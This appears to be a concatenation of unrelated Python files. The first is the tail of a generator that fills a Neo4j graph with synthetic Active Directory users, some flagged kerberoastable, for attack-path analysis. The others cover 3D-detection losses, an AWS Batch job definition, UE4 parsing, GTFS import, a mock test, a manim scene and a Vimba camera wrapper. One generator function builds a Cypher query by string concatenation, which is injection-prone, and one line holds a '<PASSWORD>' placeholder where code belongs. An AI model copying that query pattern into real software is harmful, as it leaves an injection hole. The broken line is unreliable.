lastlogon = get_user_timestamp(current_time, enabled)
objectsid = get_sid_from_rid(ridcount, domain_sid)
# New properties
savedcredentials = generate_boolean_value(savedcredentials_perc, get_complementary_value(savedcredentials_perc))
ridcount += 1
user_property = {
'id': objectsid,
'props': {
'displayname': dispname,
'name': user_name,
'enabled': enabled,
'pwdlastset': pwdlastset,
'lastlogon': lastlogon,
'lastlogontimestamp': lastlogon,
'highvalue': False,
'dontreqpreauth': dontreqpreauth,
'hasspn': hasspn,
'passwordnotreqd': <PASSWORD>,
'pwdneverexpires': pwdneverexpires,
'sensitive': False,
'serviceprincipalnames': "",
'sidhistory': sidhistory,
'unconstraineddelegation': unconstraineddelegation,
"description": "null",
"admincount": False,
"savedcredentials": savedcredentials
}
}
props.append(user_property)
user_properties_list.append(user_property)
if (len(props) > 500):
session.run('UNWIND $props as prop MERGE (n:Base {objectid:prop.id}) SET n:User, n += prop.props WITH n MATCH (m:Group {name:$gname}) WITH n,m MERGE (n)-[:MemberOf]->(m)', props=props, gname=group_name)
props = []
session.run('UNWIND $props as prop MERGE (n:Base {objectid:prop.id}) SET n:User, n += prop.props WITH n MATCH (m:Group {name:$gname}) WITH n,m MERGE (n)-[:MemberOf {isacl:false}]->(m)', props=props, gname=group_name)
return user_properties_list, users, ridcount
def assign_kerberoastable_users(session, it_users):
i = random.randint(10, 20)
i = min(i, len(it_users))
for user in random.sample(it_users, i):
session.run('MATCH (n:User {name:$user}) SET n.hasspn=true', user=user)
def set_user_dn(session, user_name, ou_dn):
user_dn = get_dn(user_name, ou_dn)
query = "MATCH (n:User { name: '" + user_name + "' }) SET n.distinguishedname = '" + user_dn + "' RETURN n.name, n.distinguishedname"
session.run(query)
|
1697688
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import sys
import os
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
ROOT_DIR = os.path.dirname(BASE_DIR)
sys.path.append(os.path.join(ROOT_DIR, 'utils'))
from .losses import smoothl1_loss, l1_loss, SigmoidFocalClassificationLoss
def compute_points_obj_cls_loss_hard_topk(end_points, topk):
box_label_mask = end_points['box_label_mask']
seed_inds = end_points['seed_inds'].long() # B, K
seed_xyz = end_points['seed_xyz'] # B, K, 3
seeds_obj_cls_logits = end_points['seeds_obj_cls_logits'] # B, 1, K
gt_center = end_points['center_label'][:, :, 0:3] # B, K2, 3
gt_size = end_points['size_gts'][:, :, 0:3] # B, K2, 3
B = gt_center.shape[0]
K = seed_xyz.shape[1]
K2 = gt_center.shape[1]
point_instance_label = end_points['point_instance_label'] # B, num_points
object_assignment = torch.gather(point_instance_label, 1, seed_inds) # B, num_seed
object_assignment[object_assignment < 0] = K2 - 1 # set background points to the last gt bbox
object_assignment_one_hot = torch.zeros((B, K, K2)).to(seed_xyz.device)
object_assignment_one_hot.scatter_(2, object_assignment.unsqueeze(-1), 1) # (B, K, K2)
delta_xyz = seed_xyz.unsqueeze(2) - gt_center.unsqueeze(1) # (B, K, K2, 3)
delta_xyz = delta_xyz / (gt_size.unsqueeze(1) + 1e-6) # (B, K, K2, 3)
new_dist = torch.sum(delta_xyz ** 2, dim=-1)
euclidean_dist1 = torch.sqrt(new_dist + 1e-6) # BxKxK2
euclidean_dist1 = euclidean_dist1 * object_assignment_one_hot + 100 * (1 - object_assignment_one_hot) # BxKxK2
euclidean_dist1 = euclidean_dist1.transpose(1, 2).contiguous() # BxK2xK
topk_inds = torch.topk(euclidean_dist1, topk, largest=False)[1] * box_label_mask[:, :, None] + \
(box_label_mask[:, :, None] - 1) # BxK2xtopk
topk_inds = topk_inds.long() # BxK2xtopk
topk_inds = topk_inds.view(B, -1).contiguous() # B, K2xtopk
batch_inds = torch.arange(B).unsqueeze(1).repeat(1, K2 * topk).to(seed_xyz.device)
batch_topk_inds = torch.stack([batch_inds, topk_inds], -1).view(-1, 2).contiguous()
objectness_label = torch.zeros((B, K + 1), dtype=torch.long).to(seed_xyz.device)
objectness_label[batch_topk_inds[:, 0], batch_topk_inds[:, 1]] = 1
objectness_label = objectness_label[:, :K]
objectness_label_mask = torch.gather(point_instance_label, 1, seed_inds) # B, num_seed
objectness_label[objectness_label_mask < 0] = 0
total_num_points = B * K
end_points[f'points_hard_topk{topk}_pos_ratio'] = \
torch.sum(objectness_label.float()) / float(total_num_points)
end_points[f'points_hard_topk{topk}_neg_ratio'] = 1 - end_points[f'points_hard_topk{topk}_pos_ratio']
# Compute objectness loss
criterion = SigmoidFocalClassificationLoss()
cls_weights = (objectness_label >= 0).float()
cls_normalizer = cls_weights.sum(dim=1, keepdim=True).float()
cls_weights /= torch.clamp(cls_normalizer, min=1.0)
cls_loss_src = criterion(seeds_obj_cls_logits.view(B, K, 1), objectness_label.unsqueeze(-1), weights=cls_weights)
objectness_loss = cls_loss_src.sum() / B
# Compute recall upper bound
padding_array = torch.arange(0, B).to(point_instance_label.device) * 10000
padding_array = padding_array.unsqueeze(1) # B,1
point_instance_label_mask = (point_instance_label < 0) # B,num_points
point_instance_label = point_instance_label + padding_array # B,num_points
point_instance_label[point_instance_label_mask] = -1
num_gt_bboxes = torch.unique(point_instance_label).shape[0] - 1
seed_instance_label = torch.gather(point_instance_label, 1, seed_inds) # B,num_seed
pos_points_instance_label = seed_instance_label * objectness_label + (objectness_label - 1)
num_query_bboxes = torch.unique(pos_points_instance_label).shape[0] - 1
if num_gt_bboxes > 0:
end_points[f'points_hard_topk{topk}_upper_recall_ratio'] = num_query_bboxes / num_gt_bboxes
return objectness_loss
def compute_objectness_loss_based_on_query_points(end_points, num_decoder_layers):
""" Compute objectness loss for the proposals.
"""
if num_decoder_layers > 0:
prefixes = ['proposal_'] + ['last_'] + [f'{i}head_' for i in range(num_decoder_layers - 1)]
else:
prefixes = ['proposal_'] # only proposal
objectness_loss_sum = 0.0
for prefix in prefixes:
# Associate proposal and GT objects
seed_inds = end_points['seed_inds'].long() # B,num_seed in [0,num_points-1]
gt_center = end_points['center_label'][:, :, 0:3] # B, K2, 3
query_points_sample_inds = end_points['query_points_sample_inds'].long()
B = seed_inds.shape[0]
K = query_points_sample_inds.shape[1]
K2 = gt_center.shape[1]
seed_obj_gt = torch.gather(end_points['point_obj_mask'], 1, seed_inds) # B,num_seed
query_points_obj_gt = torch.gather(seed_obj_gt, 1, query_points_sample_inds) # B, query_points
point_instance_label = end_points['point_instance_label'] # B, num_points
seed_instance_label = torch.gather(point_instance_label, 1, seed_inds) # B,num_seed
query_points_instance_label = torch.gather(seed_instance_label, 1, query_points_sample_inds) # B,query_points
objectness_mask = torch.ones((B, K)).cuda()
# Set assignment
object_assignment = query_points_instance_label # (B,K) with values in 0,1,...,K2-1
object_assignment[object_assignment < 0] = K2 - 1 # set background points to the last gt bbox
end_points[f'{prefix}objectness_label'] = query_points_obj_gt
end_points[f'{prefix}objectness_mask'] = objectness_mask
end_points[f'{prefix}object_assignment'] = object_assignment
total_num_proposal = query_points_obj_gt.shape[0] * query_points_obj_gt.shape[1]
end_points[f'{prefix}pos_ratio'] = \
torch.sum(query_points_obj_gt.float().cuda()) / float(total_num_proposal)
end_points[f'{prefix}neg_ratio'] = \
torch.sum(objectness_mask.float()) / float(total_num_proposal) - end_points[f'{prefix}pos_ratio']
# Compute objectness loss
objectness_scores = end_points[f'{prefix}objectness_scores']
criterion = SigmoidFocalClassificationLoss()
cls_weights = objectness_mask.float()
cls_normalizer = cls_weights.sum(dim=1, keepdim=True).float()
cls_weights /= torch.clamp(cls_normalizer, min=1.0)
cls_loss_src = criterion(objectness_scores.transpose(2, 1).contiguous().view(B, K, 1),
query_points_obj_gt.unsqueeze(-1),
weights=cls_weights)
objectness_loss = cls_loss_src.sum() / B
end_points[f'{prefix}objectness_loss'] = objectness_loss
objectness_loss_sum += objectness_loss
return objectness_loss_sum, end_points
def compute_box_and_sem_cls_loss(end_points, config, num_decoder_layers,
center_loss_type='smoothl1', center_delta=1.0,
size_loss_type='smoothl1', size_delta=1.0,
heading_loss_type='smoothl1', heading_delta=1.0,
size_cls_agnostic=False):
""" Compute 3D bounding box and semantic classification loss.
"""
num_heading_bin = config.num_heading_bin
num_size_cluster = config.num_size_cluster
num_class = config.num_class
mean_size_arr = config.mean_size_arr
if num_decoder_layers > 0:
prefixes = ['proposal_'] + ['last_'] + [f'{i}head_' for i in range(num_decoder_layers - 1)]
else:
prefixes = ['proposal_'] # only proposal
box_loss_sum = 0.0
sem_cls_loss_sum = 0.0
for prefix in prefixes:
object_assignment = end_points[f'{prefix}object_assignment']
batch_size = object_assignment.shape[0]
# Compute center loss
pred_center = end_points[f'{prefix}center']
gt_center = end_points['center_label'][:, :, 0:3]
if center_loss_type == 'smoothl1':
objectness_label = end_points[f'{prefix}objectness_label'].float()
object_assignment_expand = object_assignment.unsqueeze(2).repeat(1, 1, 3)
assigned_gt_center = torch.gather(gt_center, 1, object_assignment_expand) # (B, K, 3) from (B, K2, 3)
center_loss = smoothl1_loss(assigned_gt_center - pred_center, delta=center_delta) # (B,K)
center_loss = torch.sum(center_loss * objectness_label.unsqueeze(2)) / (torch.sum(objectness_label) + 1e-6)
elif center_loss_type == 'l1':
objectness_label = end_points[f'{prefix}objectness_label'].float()
object_assignment_expand = object_assignment.unsqueeze(2).repeat(1, 1, 3)
assigned_gt_center = torch.gather(gt_center, 1, object_assignment_expand) # (B, K, 3) from (B, K2, 3)
center_loss = l1_loss(assigned_gt_center - pred_center) # (B,K)
center_loss = torch.sum(center_loss * objectness_label.unsqueeze(2)) / (torch.sum(objectness_label) + 1e-6)
else:
raise NotImplementedError
# Compute heading loss
heading_class_label = torch.gather(end_points['heading_class_label'], 1,
object_assignment) # select (B,K) from (B,K2)
criterion_heading_class = nn.CrossEntropyLoss(reduction='none')
heading_class_loss = criterion_heading_class(end_points[f'{prefix}heading_scores'].transpose(2, 1),
heading_class_label) # (B,K)
heading_class_loss = torch.sum(heading_class_loss * objectness_label) / (torch.sum(objectness_label) + 1e-6)
heading_residual_label = torch.gather(end_points['heading_residual_label'], 1,
object_assignment) # select (B,K) from (B,K2)
heading_residual_normalized_label = heading_residual_label / (np.pi / num_heading_bin)
# Ref: https://discuss.pytorch.org/t/convert-int-into-one-hot-format/507/3
heading_label_one_hot = torch.cuda.FloatTensor(batch_size, heading_class_label.shape[1],
num_heading_bin).zero_()
heading_label_one_hot.scatter_(2, heading_class_label.unsqueeze(-1),
1) # src==1 so it's *one-hot* (B,K,num_heading_bin)
heading_residual_normalized_error = torch.sum(
end_points[f'{prefix}heading_residuals_normalized'] * heading_label_one_hot,
-1) - heading_residual_normalized_label
if heading_loss_type == 'smoothl1':
heading_residual_normalized_loss = heading_delta * smoothl1_loss(heading_residual_normalized_error,
delta=heading_delta) # (B,K)
heading_residual_normalized_loss = torch.sum(
heading_residual_normalized_loss * objectness_label) / (torch.sum(objectness_label) + 1e-6)
elif heading_loss_type == 'l1':
heading_residual_normalized_loss = l1_loss(heading_residual_normalized_error) # (B,K)
heading_residual_normalized_loss = torch.sum(
heading_residual_normalized_loss * objectness_label) / (torch.sum(objectness_label) + 1e-6)
else:
raise NotImplementedError
# Compute size loss
if size_cls_agnostic:
pred_size = end_points[f'{prefix}pred_size']
size_label = torch.gather(
end_points['size_gts'], 1,
object_assignment.unsqueeze(-1).repeat(1, 1, 3)) # select (B,K,3) from (B,K2,3)
size_error = pred_size - size_label
if size_loss_type == 'smoothl1':
size_loss = size_delta * smoothl1_loss(size_error,
delta=size_delta) # (B,K,3) -> (B,K)
size_loss = torch.sum(size_loss * objectness_label.unsqueeze(2)) / (
torch.sum(objectness_label) + 1e-6)
elif size_loss_type == 'l1':
size_loss = l1_loss(size_error) # (B,K,3) -> (B,K)
size_loss = torch.sum(size_loss * objectness_label.unsqueeze(2)) / (
torch.sum(objectness_label) + 1e-6)
else:
raise NotImplementedError
else:
size_class_label = torch.gather(end_points['size_class_label'], 1,
object_assignment) # select (B,K) from (B,K2)
criterion_size_class = nn.CrossEntropyLoss(reduction='none')
size_class_loss = criterion_size_class(end_points[f'{prefix}size_scores'].transpose(2, 1),
size_class_label) # (B,K)
size_class_loss = torch.sum(size_class_loss * objectness_label) / (torch.sum(objectness_label) + 1e-6)
size_residual_label = torch.gather(
end_points['size_residual_label'], 1,
object_assignment.unsqueeze(-1).repeat(1, 1, 3)) # select (B,K,3) from (B,K2,3)
size_label_one_hot = torch.cuda.FloatTensor(batch_size, size_class_label.shape[1], num_size_cluster).zero_()
size_label_one_hot.scatter_(2, size_class_label.unsqueeze(-1),
1) # src==1 so it's *one-hot* (B,K,num_size_cluster)
size_label_one_hot_tiled = size_label_one_hot.unsqueeze(-1).repeat(1, 1, 1, 3) # (B,K,num_size_cluster,3)
predicted_size_residual_normalized = torch.sum(
end_points[f'{prefix}size_residuals_normalized'] * size_label_one_hot_tiled,
2) # (B,K,3)
mean_size_arr_expanded = torch.from_numpy(mean_size_arr.astype(np.float32)).cuda().unsqueeze(0).unsqueeze(
0) # (1,1,num_size_cluster,3)
mean_size_label = torch.sum(size_label_one_hot_tiled * mean_size_arr_expanded, 2) # (B,K,3)
size_residual_label_normalized = size_residual_label / mean_size_label # (B,K,3)
size_residual_normalized_error = predicted_size_residual_normalized - size_residual_label_normalized
if size_loss_type == 'smoothl1':
size_residual_normalized_loss = size_delta * smoothl1_loss(size_residual_normalized_error,
delta=size_delta) # (B,K,3) -> (B,K)
size_residual_normalized_loss = torch.sum(
size_residual_normalized_loss * objectness_label.unsqueeze(2)) / (
torch.sum(objectness_label) + 1e-6)
elif size_loss_type == 'l1':
size_residual_normalized_loss = l1_loss(size_residual_normalized_error) # (B,K,3) -> (B,K)
size_residual_normalized_loss = torch.sum(
size_residual_normalized_loss * objectness_label.unsqueeze(2)) / (
torch.sum(objectness_label) + 1e-6)
else:
raise NotImplementedError
# 3.4 Semantic cls loss
sem_cls_label = torch.gather(end_points['sem_cls_label'], 1, object_assignment) # select (B,K) from (B,K2)
criterion_sem_cls = nn.CrossEntropyLoss(reduction='none')
sem_cls_loss = criterion_sem_cls(end_points[f'{prefix}sem_cls_scores'].transpose(2, 1), sem_cls_label) # (B,K)
sem_cls_loss = torch.sum(sem_cls_loss * objectness_label) / (torch.sum(objectness_label) + 1e-6)
end_points[f'{prefix}center_loss'] = center_loss
end_points[f'{prefix}heading_cls_loss'] = heading_class_loss
end_points[f'{prefix}heading_reg_loss'] = heading_residual_normalized_loss
if size_cls_agnostic:
end_points[f'{prefix}size_reg_loss'] = size_loss
box_loss = center_loss + 0.1 * heading_class_loss + heading_residual_normalized_loss + size_loss
else:
end_points[f'{prefix}size_cls_loss'] = size_class_loss
end_points[f'{prefix}size_reg_loss'] = size_residual_normalized_loss
box_loss = center_loss + 0.1 * heading_class_loss + heading_residual_normalized_loss + 0.1 * size_class_loss + size_residual_normalized_loss
end_points[f'{prefix}box_loss'] = box_loss
end_points[f'{prefix}sem_cls_loss'] = sem_cls_loss
box_loss_sum += box_loss
sem_cls_loss_sum += sem_cls_loss
return box_loss_sum, sem_cls_loss_sum, end_points
def get_loss(end_points, config, num_decoder_layers,
query_points_generator_loss_coef, obj_loss_coef, box_loss_coef, sem_cls_loss_coef,
query_points_obj_topk=5,
center_loss_type='smoothl1', center_delta=1.0,
size_loss_type='smoothl1', size_delta=1.0,
heading_loss_type='smoothl1', heading_delta=1.0,
size_cls_agnostic=False):
""" Loss functions
"""
if 'seeds_obj_cls_logits' in end_points.keys():
query_points_generation_loss = compute_points_obj_cls_loss_hard_topk(end_points, query_points_obj_topk)
end_points['query_points_generation_loss'] = query_points_generation_loss
else:
query_points_generation_loss = 0.0
# Obj loss
objectness_loss_sum, end_points = \
compute_objectness_loss_based_on_query_points(end_points, num_decoder_layers)
end_points['sum_heads_objectness_loss'] = objectness_loss_sum
# Box loss and sem cls loss
box_loss_sum, sem_cls_loss_sum, end_points = compute_box_and_sem_cls_loss(
end_points, config, num_decoder_layers,
center_loss_type, center_delta=center_delta,
size_loss_type=size_loss_type, size_delta=size_delta,
heading_loss_type=heading_loss_type, heading_delta=heading_delta,
size_cls_agnostic=size_cls_agnostic)
end_points['sum_heads_box_loss'] = box_loss_sum
end_points['sum_heads_sem_cls_loss'] = sem_cls_loss_sum
# means average proposal with prediction loss
loss = query_points_generator_loss_coef * query_points_generation_loss + \
1.0 / (num_decoder_layers + 1) * (
obj_loss_coef * objectness_loss_sum + box_loss_coef * box_loss_sum + sem_cls_loss_coef * sem_cls_loss_sum)
loss *= 10
end_points['loss'] = loss
return loss, end_points
|
1697696
|
def get_job_definition(account, region, container_name, job_def_name, job_param_s3uri_destination, memoryInMB, ncpus,
role_name):
"""
This is the job definition for this sample job.
:param account:
:param region:
:param container_name:
:param job_def_name:
:param memoryInMB:
:param ncpus:
:param role_name:
:return:
"""
return {
"jobDefinitionName": job_def_name,
"type": "container",
# These are the arguments for the job
"parameters": {
"localpath": "/data",
"s3destination": job_param_s3uri_destination,
"s3src": job_param_s3uri_destination,
"s3network": job_param_s3uri_destination,
"networktype": "CnnPos",
"threshold": "0.0"
},
# Specify container & jobs properties include entry point and job args that are referred to in parameters
"containerProperties": {
"image": container_name,
"vcpus": ncpus,
"memory": memoryInMB,
"command": [
"bash",
"scripts/inference.sh",
"Ref::s3src",
"Ref::s3destination",
"Ref::s3network",
"Ref::networktype",
"Ref::localpath",
"Ref::threshold"
],
"jobRoleArn": "arn:aws:iam::{}:role/{}".format(account, role_name),
"volumes": [
{
"host": {
"sourcePath": "/dev/shm"
},
"name": "data"
}
],
"environment": [
{
"name": "AWS_DEFAULT_REGION",
"value": region
}
],
"mountPoints": [
{
"containerPath": "/data",
"readOnly": False,
"sourceVolume": "data"
}
],
"readonlyRootFilesystem": False,
"privileged": True,
"ulimits": [],
"user": ""
},
"retryStrategy": {
"attempts": 5
}
}
|
1697711
|
from UE4Parse.BinaryReader import BinaryStream
from UE4Parse.Assets.Objects.FText import FText
class FNavAgentSelectorCustomization:
SupportedDesc: FText
def __init__(self, reader: BinaryStream):
self.SupportedDesc = FText(reader)
|
1697728
|
import pandas as pd
from shapely.geometry import LineString, Point
from syspy.spatial import spatial, zoning
from syspy.transitfeed import feed_links
# seconds
def to_seconds(time_string):
return pd.to_timedelta(time_string).total_seconds()
def point_geometry(row):
return Point(row['stop_lon'], row['stop_lat'])
def linestring_geometry(dataframe, point_dict, from_point, to_point):
df = dataframe.copy()
def geometry(row):
return LineString(
(point_dict[row[from_point]], point_dict[row[to_point]]))
return df.apply(geometry, axis=1)
class BaseGtfsImporter():
"""
importer = BaseGtfsImporter(gtfs_path)
importer.read()
importer.build()
sm = stepmodel.StepModel()
sm.links = importer.links
sm.nodes = importer.stops
"""
def __init__(self, gtfs_path):
self.gtfs_path = gtfs_path
def read(self, encoding=None):
self.stop_times = pd.read_csv(
self.gtfs_path + 'stop_times.txt',
encoding=encoding,
)
self.trips = pd.read_csv(
self.gtfs_path + 'trips.txt',
encoding=encoding,
low_memory=False # mixed types
)
self.routes = pd.read_csv(
self.gtfs_path + 'routes.txt',
encoding=encoding
)
self.stops = pd.read_csv(self.gtfs_path + 'stops.txt', encoding=encoding)
def pick_trips(self):
# one trip by direction
self.trips = pd.merge(self.trips, self.routes[['route_id']])
self.trips = self.trips.groupby(
['route_id', 'direction_id'],
as_index=False
).first()
self.stop_times = pd.merge(self.stop_times, self.trips[['trip_id']])
stop_id_set = set(self.stop_times['stop_id'])
self.stops = self.stops.loc[self.stops['stop_id'].isin(stop_id_set)]
def to_seconds(self):
time_columns = ['arrival_time', 'departure_time']
self.stop_times[time_columns] = self.stop_times[
time_columns].applymap(to_seconds)
def build_links(self):
links = feed_links.link_from_stop_times(
self.stop_times,
max_shortcut=1,
stop_id='stop_id',
keep_origin_columns=['departure_time'],
keep_destination_columns=['arrival_time'],
stop_id_origin='origin',
stop_id_destination='destination',
out_sequence='link_sequence'
).reset_index()
links['time'] = links['arrival_time'] - links['departure_time']
links.rename(
columns={
'origin': 'a',
'destination': 'b',
},
inplace=True
)
self.links = links
def merge_tables(self):
# merge
self.trips = pd.merge(self.trips, self.routes, on='route_id')
# [['trip_id', 'route_id', 'direction_id']]
self.links = pd.merge(self.links, self.trips, on='trip_id')
def build_geometries(self):
self.stops['geometry'] = self.stops.apply(point_geometry, axis=1)
self.links['geometry'] = linestring_geometry(
self.links,
self.stops.set_index('stop_id')['geometry'].to_dict(),
'a',
'b'
)
def cast_columns_to_string(
self,
columns=['trip_id', 'route_id', 'stop_id']
):
for key, attr in self.__dict__.items():
try:
cols = []
for c in attr.columns:
if c in columns:
cols.append(c)
attr[c] = attr[c].astype(str)
print(key, cols, 'converted to string')
except AttributeError: # 'str' object has no attribute 'columns'
pass
def build(self):
self.pick_trips()
self.to_seconds()
self.build_links()
self.merge_tables()
self.build_geometries()
|
1697738
|
import pytest
from unittest import mock
from nesta.packages.novelty.lolvelty import lolvelty
def test_lolvelty():
es = mock.MagicMock()
es.count.return_value = {'count': 100}
# Very novel
es.search.return_value = {'hits': {'hits':[{'_score':100},
{'_score':5},
{'_score':1},
{'_score':1},
{'_score':1}],
'max_score': 100}}
score = lolvelty(es, 'an_index', 'some_doc', [''])
assert score > 200
# Not novel at all
es.search.return_value = {'hits': {'hits':[{'_score':1},
{'_score':1},
{'_score':1},
{'_score':1},
{'_score':1}],
'max_score': 1}}
score = lolvelty(es, 'an_index', 'some_doc', [''])
assert score < 0
# Somewhat novel
es.search.return_value = {'hits': {'hits':[{'_score':10},
{'_score':10},
{'_score':1},
{'_score':1},
{'_score':1}],
'max_score': 10}}
score = lolvelty(es, 'an_index', 'some_doc', [''])
assert score > 0 and score < 200
|
1697752
|
from pathlib import Path
from manim import *
class Determinant(Scene):
def construct(self):
text_color = "#333"
vect1_color = "#b98b99"
vect2_color = "#b9b28b"
numberplane = NumberPlane(
background_line_style={
"stroke_opacity": 0.4
}
)
determinant = MathTex(
"\\det\\left( \\begin{bmatrix}a && b \\\\ c && d \\end{bmatrix}\\right) = ad - bc", font_size=105
).set_color(text_color)
determinant[0][5].set_color(vect1_color)
determinant[0][6].set_color(vect2_color)
determinant[0][7].set_color(vect1_color)
determinant[0][8].set_color(vect2_color)
determinant[0][12].set_color(vect1_color)
determinant[0][13].set_color(vect2_color)
determinant[0][15].set_color(vect2_color)
determinant[0][16].set_color(vect1_color)
determinant.move_to(ORIGIN + UP * 2.25)
origin = np.array([-6, -3, 0])
vect_1 = np.array([12, 0, 0])
vect_2 = np.array([0, 3, 0])
grid_1 = vect_1 + vect_2
grid_2 = vect_2 + vect_1
vect1 = Line(start=origin, end=origin + vect_1, stroke_color=vect1_color, stroke_width=10).add_tip()
dashed_line1 = DashedLine(start=origin + vect_1, end=origin + grid_1, stroke_color="#ccc", stroke_width=10)
vect2 = Line(start=origin, end=origin + vect_2, stroke_color=vect2_color, stroke_width=10).add_tip()
dashed_line2 = DashedLine(start=origin + vect_2, end=origin + grid_2, stroke_color="#ccc", stroke_width=10)
center_point = origin + ((vect_1 + vect_2) * 0.5)
area_text = MathTex("ad - bc", font_size=150).set_color("#333").move_to(center_point)
area_text[0][0].set_color(vect1_color)
area_text[0][1].set_color(vect2_color)
area_text[0][3].set_color(vect2_color)
area_text[0][4].set_color(vect1_color)
rectangle = Rectangle(width=vect_1[0], height=vect_2[1], color="#ccc").move_to(center_point)
self.add(numberplane, rectangle, determinant, vect1, vect2, dashed_line1, dashed_line2, area_text)
if __name__ == '__main__':
config.background_color = WHITE
config.format = 'gif'
config.output_file = Path(__file__).resolve().parent.parent.parent / Path('notes/_media/determinant')
config.pixel_width = 400
config.pixel_height = 225
scene = Determinant()
scene.render()
|
1697762
|
from ctypes import byref, sizeof, c_uint32
from typing import Optional, List, Callable
import gc
from .vimba_object import VimbaObject
from .vimba_exception import VimbaException
from .frame import Frame
from . import vimba_c
SINGLE_FRAME = 'SingleFrame'
CONTINUOUS = 'Continuous'
def _camera_infos() -> List[vimba_c.VmbCameraInfo]:
"""
Gets camera info of all attached cameras.
"""
# call once just to get the number of cameras
vmb_camera_info = vimba_c.VmbCameraInfo()
num_found = c_uint32(-1)
error = vimba_c.vmb_cameras_list(byref(vmb_camera_info),
0,
byref(num_found),
sizeof(vmb_camera_info))
if error and error != VimbaException.ERR_DATA_TOO_LARGE:
raise VimbaException(error)
# call again to get the features
num_cameras = num_found.value
vmb_camera_infos = (vimba_c.VmbCameraInfo * num_cameras)()
error = vimba_c.vmb_cameras_list(vmb_camera_infos,
num_cameras,
byref(num_found),
sizeof(vmb_camera_info))
if error:
raise VimbaException(error)
return list(vmb_camera_info for vmb_camera_info in vmb_camera_infos)
def _camera_info(id_string: str) -> vimba_c.VmbCameraInfo:
"""
Gets camera info object of specified camera.
:param id_string: the ID of the camera object to get. This can be an ID or e.g. a serial number.
Check the Vimba documentation for other possible values.
"""
vmb_camera_info = vimba_c.VmbCameraInfo()
error = vimba_c.vmb_camera_info_query(id_string.encode(),
vmb_camera_info,
sizeof(vmb_camera_info))
if error:
raise VimbaException(error)
return vmb_camera_info
def camera_ids():
"""
Gets IDs of all available cameras.
"""
return list(vmb_camera_info.cameraIdString.decode()
for vmb_camera_info in _camera_infos())
class Camera(VimbaObject):
"""
A Vimba camera object.
"""
def __init__(self, vimba, camera_id: str):
self._camera_id = camera_id
super().__init__(vimba)
# remember state
self._is_armed = False
self._is_acquiring = False
self._acquisition_mode = ''
self._frame_buffer = ()
# user registered callback function
self._user_callback = None
@property
def handle(self):
return self._handle
@property
def camera_id(self) -> str:
return self._camera_id
@property
def info(self) -> vimba_c.VmbCameraInfo:
"""
Get info of the camera. Does not require the camera to be opened.
"""
return _camera_info(self.camera_id)
def open(self,
camera_access_mode: Optional[int] = VimbaObject.VMB_ACCESS_MODE_FULL,
adjust_packet_size: Optional[bool] = True):
"""
Open the camera with requested access mode. Adjusts packet size by default.
:param camera_access_mode: Access mode to open the camera in.
:param adjust_packet_size: Adjust packet size for GigE cameras.
"""
error = vimba_c.vmb_camera_open(self.camera_id.encode(),
camera_access_mode,
byref(self._handle))
if error:
raise VimbaException(error)
# may experience issues with ethernet commands if not called
if adjust_packet_size:
try:
self.GVSPAdjustPacketSize()
# ignore error on non-GigE cameras
except AttributeError:
pass
def close(self):
"""
Close the camera.
"""
self.unregister_all_feature_invalidation_callbacks()
error = vimba_c.vmb_camera_close(self._handle)
if error:
raise VimbaException(error)
def revoke_all_frames(self):
"""
Revoke all frames assigned to the camera.
"""
error = vimba_c.vmb_frame_revoke_all(self._handle)
if error:
raise VimbaException(error)
def start_capture(self):
"""
Prepare the API for incoming frames.
"""
error = vimba_c.vmb_capture_start(self._handle)
if error:
raise VimbaException(error)
def end_capture(self):
"""
Stop the API from being able to receive frames.
"""
error = vimba_c.vmb_capture_end(self._handle)
if error:
raise VimbaException(error)
def flush_capture_queue(self):
"""
Flush the capture queue.
"""
error = vimba_c.vmb_capture_queue_flush(self._handle)
if error:
raise VimbaException(error)
def new_frame(self) -> Frame:
"""
Creates and returns a new frame object. Multiple frames per camera can therefore be
returned.
"""
return Frame(self)
def arm(self, mode: str, callback: Optional[Callable] = None,
frame_buffer_size: Optional[int] = 10) -> None:
"""
Arm the camera by starting the capture engine and creating frames.
:param mode: Either 'SingleFrame' to acquire a single frame or 'Continuous' for streaming
frames.
:param callback: A function reference to call when each frame is ready. Applies to
'Continuous' acquisition mode only. The callback function should execute relatively quickly
to avoid dropping frames (if the camera captures a frame but no frame is currently queued
for capture then the frame will be dropped. Therefore the callback function should execute
(on average) at least as fast as the camera frame rate. It may be desirable for the
callback to copy frame data and pass the data to a separate thread/process for processing.
:param frame_buffer_size: number of frames to create and use for the acquisition buffer.
Applies to 'Continuous' acquisition mode only. Increasing this may help if frames are being
dropped.
"""
if self._is_armed:
raise VimbaException(VimbaException.ERR_INVALID_CAMERA_MODE)
if mode not in (SINGLE_FRAME, CONTINUOUS):
raise ValueError('unknown mode')
if mode == SINGLE_FRAME:
frame_buffer_size = 1
# set and remember mode
self.AcquisitionMode = mode
self._acquisition_mode = mode
# create frame buffer and announce frames to camera
self._frame_buffer = tuple(self.new_frame()
for _ in range(frame_buffer_size))
for frame in self._frame_buffer:
frame.announce()
self.start_capture()
# setup frame ready callbacks
if mode == CONTINUOUS:
if callback is None:
def callback(frame: Frame) -> None:
pass
self._user_callback = callback
for frame in self._frame_buffer:
frame.queue_for_capture(self._streaming_callback)
self._is_armed = True
def acquire_frame(self, timeout_ms: Optional[int] = 2000) -> Frame:
"""
Acquire and return a single frame when the camera is armed in 'SingleFrame' acquisition
mode. Can be called multiple times in a row, but don't call again until the frame has been
copied or processed the internal frame object is reused.
"""
if not self._is_armed or self._acquisition_mode != SINGLE_FRAME:
raise VimbaException(VimbaException.ERR_INVALID_CAMERA_MODE)
# capture a single frame
self._frame_buffer[0].queue_for_capture()
self.AcquisitionStart()
self._frame_buffer[0].wait_for_capture(timeout_ms)
self.AcquisitionStop()
return self._frame_buffer[0]
def start_frame_acquisition(self) -> None:
"""
Acquire and stream frames (to the specified callback function) indefinitely when the camera
is armed in 'Continuous' acquisition mode.
"""
# no need to check self._is_acquiring
if not self._is_armed or self._acquisition_mode != CONTINUOUS:
raise VimbaException(VimbaException.ERR_INVALID_CAMERA_MODE)
# safe to call multiple times
self.AcquisitionStart()
self._is_acquiring = True
def _streaming_callback(self, frame: Frame) -> None:
"""
Called upon the frame ready event. Wraps the user's callback and requeues the frame.
"""
self._user_callback(frame)
# streaming may have stopped by now, especially if callback is long running
if self._is_armed and self._acquisition_mode == CONTINUOUS:
frame.queue_for_capture(self._streaming_callback)
def stop_frame_acquisition(self) -> None:
"""
Stop acquiring and streaming frames.
"""
# implies both is armed and in continuous mode
if self._is_acquiring:
self._is_acquiring = False
self.AcquisitionStop()
def disarm(self) -> None:
"""
